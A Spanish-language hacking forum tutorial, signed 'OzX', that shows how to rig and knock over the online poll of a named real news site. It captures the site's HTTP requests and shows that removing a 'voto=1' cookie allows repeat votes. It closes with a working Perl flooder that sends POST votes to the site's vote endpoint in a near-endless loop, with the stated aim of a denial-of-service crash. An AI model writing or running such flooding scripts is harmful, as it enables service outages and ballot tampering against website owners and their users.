un D.o.S se pueden hacer de muchisimas formas no es exclusivo de atakes botnes, aveces lo bueno es buscar lo fatal en lo sencillo.
- Analizando el Lado Oscuro de la auditoria Web, aveces queremos votar un sitio web, por distintas razones que estas sean, sin embargo la mayoria para no decir todos, empiezan a analizar la web en busca de las vulnes genericas, blog, foros, etc. CMS en general.
- Pero Aveces la solucion esta mucho mas Simple.
- El maximo de daño desde lo mas simple
- Por ejemplo en Muchos Sitios Web se encuentran sistemas de Votaciones, y estas estan conectados a la base de datos,en donde la podemos afectar si la saturamos con multiples votaciones en muy pocos Segundos o en un tiempo prolongado.
Para Evitar Estos Tipos de "Saturaciones", Existen 2 Tipos de Restricciones (para votar mas de 1 vez):
Por Ej:
Votamos:
Ahora Analizamos las Cabezeras Http, Antes ,"en el acto" y Despues de Votar::
- Antes de Votar
Host:
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesionwww.elcanillita.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
En el Acto de Votar:
Host:
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesionwww.elcanillita.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer SesionCookie: PHPSESSID=i4tgn9pmncb8tgmjokavkqcrj2;
Content-Type: application/x-www-form-urlencoded
radio=opcion2&url_back=%2Findex.php
Despues de Votar:
GET / HTTP/1.1
Host:
Necesitas ser usuario para ver los enlaces
Crear Usuario Hacer Sesionwww.elcanillita.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1Podemos Ver que Este Sistema Esta basado en el Registro de Cookies en Nuestro Navegador:
Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1
Podemos Ver como el Mismo Php nos Genera una cookie de nuestra session, y tambien nos registra el Voto, el cual dice claramente que ya vamos 1 vez.y Tenemos el Contenido Post De la Votacion
radio=opcion2&url_back=%2Findex.php
Elige la Opcion 2 "Obama" (XD¡ Ek XD¡)
Ahora Modifiquemos Los Datos:
Cookie: PHPSESSID=26q3nmpv44trpf6t4kj2ro1hk5; voto=1
Si Borramos la Cookie o Tan Solo, Borramos "voto=1", podemos Volver a votar con el mismo contenido Post.
Votamos por Obama:Antes:
Despues De Repetir los Datos Eliminando "vote=1"
Podemos Ver que Podemos Manipular la Votacion, si Nada Mas Modificamos el registro de la votacion que nos deja en la cookie de nuestro navegador:
Ahora Si Automatizamos Todo Esto?
use IO::Socket;
system ("cls");
#By OzX
print q(
##############################################
# Flooder Votaciones Post #
# by OzX #
# NB.Net Labs Tutorial Post & Get H-NeZ 2 #
##############################################
);
$server="www.elcanillita.com";
$path="/confirmavoto.php";
$post="radio=opcion2&url_back=%2Findex.php";
for ($x=1;$x<=9999999999999999999999999;$x++){
$largo_post = length $post;
my $socket = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "\n Error: $!\n" unless $socket;
print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server \n";
print $socket "Referer: $server\n";
print $socket "Accept-Language: en-us\n";
print $socket "Content-Type: application/x-www-form-urlencoded\n";
print $socket "Accept-Encoding: gzip, deflate\n";
print $socket "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US;rv:1.7.Cool Gecko/20050511 Firefox/1.0.4\n";
print $socket "Connection: Keep-Alive\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Content-Length: $largo_post\n\n";
print $socket "$post\n";
close($socket);
syswrite STDOUT, ".";
}
Y CraSh¡ D.o.S
Y dejamos la Votacion en Las Nubes.
OzX¡
Autor